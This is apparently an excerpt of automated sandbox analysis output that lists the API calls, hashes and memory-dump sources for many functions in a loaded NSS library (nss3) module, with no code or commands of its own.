                                                                                                                                                                                                                                                      • Opcode ID: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
                                                                                                                                                                                                                                                      • Instruction ID: d2e5103eb81cf54c8e6015b8f7604ffc411613f053b59e58ee46a999982467ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7baf1a6f5bcf1fe517cdf2a783e24f8dcbf2e658b7ddfa6edc5a92eb73b341a1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2B110371E002045BE720EA659C51FFF73B8DF9125EF04462CEC1996B41FB20E95882E2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
                                                                                                                                                                                                                                                      • PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2759447159-0
                                                                                                                                                                                                                                                      • Opcode ID: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
                                                                                                                                                                                                                                                      • Instruction ID: 6963236ddda4e214036d55c625ea72ba7a5e0ded6c1e85f8c3ed32d6c2428bac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 574ae6e5f19e8e9c36c14327f7d3be5f2ae24ac78b80e3f196f02fa4770ef9f4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E62171B8A04605CFDB00EF78C884D6AB7B4FF05309F11466ADC9496B15E730E995CBA6
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800), ref: 6C4CF893
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,6C4866A0), ref: 6C4CF8AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4CF8B9
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4CF8D9
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C5A18E0), ref: 6C4CF905
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Pool$Alloc_Arena_CriticalFreeItem_Sectionfree$CallClearCopyDecodeDeleteEnterInitLockOnceQuickUnlockValuecallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3757084236-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C490710), ref: 6C488FF1
                                                                                                                                                                                                                                                      • PR_CallOnce.NSS3(6C5D2158,6C489150,00000000,?,?,?,6C489138,?,6C490710), ref: 6C489029
                                                                                                                                                                                                                                                      • calloc.MOZGLUE(00000001,00000000,?,?,6C490710), ref: 6C48904D
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C490710), ref: 6C489066
                                                                                                                                                                                                                                                      • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C490710), ref: 6C489078
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1176783091-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1E10: TlsGetValue.KERNEL32 ref: 6C4B1E36
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1E10: EnterCriticalSection.KERNEL32(?,?,?,6C48B1EE,2404110F,?,?), ref: 6C4B1E4B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B1E10: PR_Unlock.NSS3 ref: 6C4B1E76
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,6C49D079,00000000,00000001), ref: 6C49CDA5
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?,6C49D079,00000000,00000001), ref: 6C49CDB6
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C49D079,00000000,00000001), ref: 6C49CDCF
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,6C49D079,00000000,00000001), ref: 6C49CDE2
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C49CDE9
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1720798025-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502CEC
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502D02
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502D1F
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502D42
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502D5B
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C505B40: PR_GetIdentitiesLayer.NSS3 ref: 6C505B56
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C502D9C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502DB2
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C502DCF
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502DF2
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(?), ref: 6C502E0B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1593528140-0
                                                                                                                                                                                                                                                      • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                      • Instruction ID: e17366f2c83853173c258f244718ddbd8b343a848a70142d6e375df3be6afcfe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001A1F2A406009BEB309E26FC05BC7B7A5EB81318F040435E85EC6B20F632FC25C692
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C49AE42), ref: 6C4830AA
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C4830C7
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C4830E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C483116
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C48312B
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PK11_DestroyObject.NSS3(?,?), ref: 6C483154
                                                                                                                                                                                                                                                        • Part of subcall function 6C483090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C48317E
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE67
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C4799FF,?,?,?,?,?,?,?,?,?,6C472D6B,?), ref: 6C49AE7E
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE89
                                                                                                                                                                                                                                                      • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?,00000000), ref: 6C49AE96
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C472D6B,?,?), ref: 6C49AEA3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 754562246-0
                                                                                                                                                                                                                                                      • Opcode ID: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
                                                                                                                                                                                                                                                      • Instruction ID: 321ad2081eecc3de372e147ef36d63d32fa59c4435700b0cdd8de3b8b6f9dc93
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e5cc729b04a7659f968be7c449c17ec258a42a5e58b5cdf48d52f7635dfc7a2d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E01A966F8503057EB01D16CAC85E9B3B988F9765DF090035E905D7B01FB15D90642E3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDC3
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDCA
                                                                                                                                                                                                                                                      • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BDE9
                                                                                                                                                                                                                                                      • free.MOZGLUE(?,00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE21
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,6C587AFE,?,?,?,?,?,?,?,?,6C58798A), ref: 6C58BE32
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3662805584-0
                                                                                                                                                                                                                                                      • Opcode ID: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
                                                                                                                                                                                                                                                      • Instruction ID: 4c18cc17c99d0bda061c3d777b40529af16c50dd3dd6502fa36b5dcbccf03829
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 341707c39abc3b3aa0be7433ac06a5d32ee60f5f23b627a20c59350e84509f3e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E11E6B5B027109FDF00DF29CC49B063BB9AB4A254B4A0029D50AC7710E732B914CBAD
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_Free.NSS3(?), ref: 6C587C73
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C587C83
                                                                                                                                                                                                                                                      • malloc.MOZGLUE(00000001), ref: 6C587C8D
                                                                                                                                                                                                                                                      • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C587C9F
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C587CAD
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 105370314-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE0D
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58AE14
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(6C58A6D8), ref: 6C58AE36
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C58AE3D
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,00000000,?,?,6C58A6D8), ref: 6C58AE47
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
• Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 682657753-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000,?,?), ref: 6C4F9AE4
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error
                                                                                                                                                                                                                                                      • String ID: ($0@Zl$`@Zl
                                                                                                                                                                                                                                                      • API String ID: 2619118453-2516348057
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(6C5AAAF9,?), ref: 6C40BE37
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf
                                                                                                                                                                                                                                                      • String ID: Xl$PXl$winFileSize
                                                                                                                                                                                                                                                      • API String ID: 4246442610-4264483736
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C417D35
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C406D36
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C406D20
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C406D2F
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C406D2A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 632333372-598938438
                                                                                                                                                                                                                                                      • Opcode ID: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
                                                                                                                                                                                                                                                      • Instruction ID: 98b64c19365427c2bf04059f64183717dc07b67c87857371dd6b0e827477b3fe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a57f99850d5ee161323fad6a601f788b87cc56d49023785b80d75a667b4620e6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9321DE707443059BD710CF1AD841F9AB7E2AF84308F148A2DDC5A9BB51E371E98ACB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+Nl,6C4E32C2,<+Nl,00000000,00000000,?), ref: 6C4E2FDA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C4E300B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C4E302A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
